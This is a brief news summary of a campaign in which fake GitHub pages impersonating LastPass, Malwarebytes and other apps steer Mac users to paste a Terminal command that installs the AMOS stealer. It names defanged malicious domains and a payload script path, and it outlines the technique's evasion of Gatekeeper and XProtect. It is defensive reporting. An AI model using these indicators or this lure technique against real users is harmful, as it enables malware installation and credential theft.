Overview
- LastPass reported two GitHub pages created on September 16 that impersonated its Mac app, redirected to macprograms-pro[.]com with Terminal instructions, and have since been removed.
- Malwarebytes says its brand is also being faked and details a ClickFix command that decodes to gosreestr[.]com/hun/install.sh, noting the referenced files were taken down.
- Attackers use SEO and sponsored search results to elevate fraudulent repositories that impersonate more than 100 products spanning password managers, financial services, developer tools, and creative apps.
- Victims are led to paste a one‑line command that fetches an AMOS payload to /tmp, a technique that can evade Gatekeeper and XProtect and may ask for the device password to finalize installation.
- AMOS is a malware‑as‑a‑service offering reported at about $1,000 per month and now includes a backdoor for persistence, as vendors share IoCs and pursue takedowns while warning users to avoid copy‑pasted commands and to download only from official sources.